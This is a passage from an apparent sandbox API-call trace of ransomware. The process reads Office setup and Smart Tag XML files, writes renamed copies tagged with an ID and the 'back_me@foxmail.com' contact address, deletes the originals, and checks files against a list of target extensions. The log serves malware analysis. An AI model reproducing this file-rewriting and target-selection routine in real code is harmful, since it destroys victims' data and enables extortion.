lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.297] SetEndOfFile (hFile=0x1b0) returned 1 [0042.298] CloseHandle (hObject=0x1b0) returned 1 [0042.298] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0042.299] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml")) returned 1 [0042.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0042.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0042.299] lstrlenW (lpString=".doc") returned 4 [0042.299] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.299] lstrlenW (lpString=".docx") returned 5 [0042.299] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0042.299] lstrlenW (lpString=".pdf") returned 4 [0042.299] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.299] lstrlenW (lpString=".xls") returned 4 [0042.299] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.299] lstrlenW (lpString=".xlsx") returned 5 [0042.299] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0042.299] lstrlenW (lpString=".ppt") returned 4 [0042.299] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0042.299] lstrlenW (lpString=".zip") returned 4 [0042.299] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.299] lstrlenW (lpString=".rar") returned 4 [0042.299] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.299] lstrlenW (lpString=".bz2") returned 4 [0042.299] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.299] lstrlenW (lpString=".7z") returned 3 [0042.299] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0042.299] lstrlenW (lpString=".dbf") returned 4 [0042.300] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0042.300] lstrlenW (lpString=".1cd") returned 4 [0042.300] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0042.300] lstrlenW (lpString=".jpg") returned 4 [0042.300] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0042.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0042.300] lstrlenW (lpString=".doc") returned 4 [0042.300] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.300] lstrlenW (lpString=".docx") returned 5 [0042.300] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0042.300] lstrlenW (lpString=".pdf") returned 4 [0042.300] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.300] lstrlenW (lpString=".xls") returned 4 [0042.300] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.300] lstrlenW (lpString=".xlsx") returned 5 [0042.300] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0042.300] lstrlenW (lpString=".ppt") returned 4 [0042.300] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0042.300] lstrlenW (lpString=".zip") returned 4 [0042.300] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.300] lstrlenW (lpString=".rar") returned 4 [0042.300] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.300] lstrlenW (lpString=".bz2") returned 4 [0042.300] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.300] lstrlenW (lpString=".7z") returned 3 [0042.300] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0042.300] lstrlenW (lpString=".dbf") returned 4 [0042.301] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0042.301] lstrlenW (lpString=".1cd") returned 4 [0042.301] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0042.301] lstrlenW (lpString=".jpg") returned 4 [0042.301] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.301] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0042.301] lstrlenW (lpString="SETUP.XML") returned 9 [0042.301] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0042.302] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=2424) returned 1 [0042.302] CloseHandle (hObject=0x1b0) returned 1 [0042.302] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml")) returned 0x20 [0042.302] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.302] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0042.302] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.302] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.302] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0042.303] GetLastError () returned 0x0 [0042.303] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x978, lpOverlapped=0x0) returned 1 [0042.304] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x980, lpOverlapped=0x0) returned 1 [0042.305] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.305] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0042.305] SetEndOfFile (hFile=0x1a8) returned 1 [0042.305] CloseHandle (hObject=0x1a8) returned 1 [0042.306] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.306] SetEndOfFile (hFile=0x1b0) returned 1 [0042.307] CloseHandle (hObject=0x1b0) returned 1 [0042.307] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0042.307] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml")) returned 1 [0042.307] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0042.307] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0042.307] lstrlenW (lpString=".doc") returned 4 [0042.307] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.307] lstrlenW (lpString=".docx") returned 5 [0042.307] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.307] lstrlenW (lpString=".pdf") returned 4 [0042.307] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.307] lstrlenW (lpString=".xls") returned 4 [0042.307] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.307] lstrlenW (lpString=".xlsx") returned 5 [0042.308] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.308] lstrlenW (lpString=".ppt") returned 4 [0042.308] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.308] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0042.308] lstrlenW (lpString=".zip") returned 4 [0042.308] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.308] lstrlenW (lpString=".rar") returned 4 [0042.308] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.308] lstrlenW (lpString=".bz2") returned 4 [0042.308] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.308] lstrlenW (lpString=".7z") returned 3 [0042.308] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.308] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0042.308] lstrlenW (lpString=".dbf") returned 4 [0042.308] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.308] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0042.308] lstrlenW (lpString=".1cd") returned 4 [0042.308] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.308] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0042.308] lstrlenW (lpString=".jpg") returned 4 [0042.308] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.308] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0042.308] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0042.308] lstrlenW (lpString=".doc") returned 4 [0042.308] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.308] lstrlenW (lpString=".docx") returned 5 [0042.308] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.308] lstrlenW (lpString=".pdf") returned 4 [0042.308] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.308] lstrlenW (lpString=".xls") returned 4 [0042.308] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.309] lstrlenW (lpString=".xlsx") returned 5 [0042.309] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.309] lstrlenW (lpString=".ppt") returned 4 [0042.309] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0042.309] lstrlenW (lpString=".zip") returned 4 [0042.309] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.309] lstrlenW (lpString=".rar") returned 4 [0042.400] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.400] lstrlenW (lpString=".bz2") returned 4 [0042.400] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.400] lstrlenW (lpString=".7z") returned 3 [0042.400] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0042.400] lstrlenW (lpString=".dbf") returned 4 [0042.400] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0042.400] lstrlenW (lpString=".1cd") returned 4 [0042.400] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0042.400] lstrlenW (lpString=".jpg") returned 4 [0042.400] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.400] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0042.400] lstrlenW (lpString="WordMUI.XML") returned 11 [0042.400] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0042.401] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=1800) returned 1 [0042.401] CloseHandle (hObject=0x1a8) returned 1 [0042.401] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml")) returned 0x20 [0042.401] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.401] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0042.401] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.401] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.401] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0042.809] GetLastError () returned 0x0 [0042.809] ReadFile (in: hFile=0x1a8, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x708, lpOverlapped=0x0) returned 1 [0043.022] WriteFile (in: hFile=0x20c, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x710, lpOverlapped=0x0) returned 1 [0043.023] ReadFile (in: hFile=0x1a8, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.023] WriteFile (in: hFile=0x20c, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.024] SetEndOfFile (hFile=0x20c) returned 1 [0043.024] CloseHandle (hObject=0x20c) returned 1 [0043.024] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.024] SetEndOfFile (hFile=0x1a8) returned 1 [0043.025] CloseHandle (hObject=0x1a8) returned 1 [0043.025] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0043.026] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml")) returned 1 [0043.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0043.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0043.026] lstrlenW (lpString=".doc") returned 4 [0043.026] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0043.026] lstrlenW (lpString=".docx") returned 5 [0043.026] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0043.026] lstrlenW (lpString=".pdf") returned 4 [0043.026] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0043.026] lstrlenW (lpString=".xls") returned 4 [0043.026] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0043.026] lstrlenW (lpString=".xlsx") returned 5 [0043.026] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0043.026] lstrlenW (lpString=".ppt") returned 4 [0043.026] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0043.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0043.026] lstrlenW (lpString=".zip") returned 4 [0043.026] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0043.026] lstrlenW (lpString=".rar") returned 4 [0043.026] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0043.026] lstrlenW (lpString=".bz2") returned 4 [0043.036] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0043.036] lstrlenW (lpString=".7z") returned 3 [0043.036] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0043.036] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0043.036] lstrlenW (lpString=".dbf") returned 4 [0043.036] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0043.036] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0043.036] lstrlenW (lpString=".1cd") returned 4 [0043.036] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0043.036] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0043.036] lstrlenW (lpString=".jpg") returned 4 [0043.036] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0043.036] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0043.036] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0043.036] lstrlenW (lpString=".doc") returned 4 [0043.036] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0043.036] lstrlenW (lpString=".docx") returned 5 [0043.036] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0043.036] lstrlenW (lpString=".pdf") returned 4 [0043.036] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0043.036] lstrlenW (lpString=".xls") returned 4 [0043.036] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0043.036] lstrlenW (lpString=".xlsx") returned 5 [0043.036] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0043.036] lstrlenW (lpString=".ppt") returned 4 [0043.036] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0043.036] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0043.036] lstrlenW (lpString=".zip") returned 4 [0043.036] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0043.037] lstrlenW (lpString=".rar") returned 4 [0043.037] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0043.037] lstrlenW (lpString=".bz2") returned 4 [0043.037] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0043.037] lstrlenW (lpString=".7z") returned 3 [0043.037] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0043.037] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0043.037] lstrlenW (lpString=".dbf") returned 4 [0043.037] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0043.037] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0043.037] lstrlenW (lpString=".1cd") returned 4 [0043.037] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0043.037] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0043.037] lstrlenW (lpString=".jpg") returned 4 [0043.037] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0043.037] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0043.037] lstrlenW (lpString="TIME.XML") returned 8 [0043.037] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0043.038] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=8564) returned 1 [0043.038] CloseHandle (hObject=0x1a8) returned 1 [0043.038] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml")) returned 0x20 [0043.038] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0043.038] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0043.038] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.038] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.038] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0043.038] GetLastError () returned 0x0 [0043.038] ReadFile (in: hFile=0x1a8, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x2174, lpOverlapped=0x0) returned 1 [0043.214] WriteFile (in: hFile=0x20c, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x322fc9c, 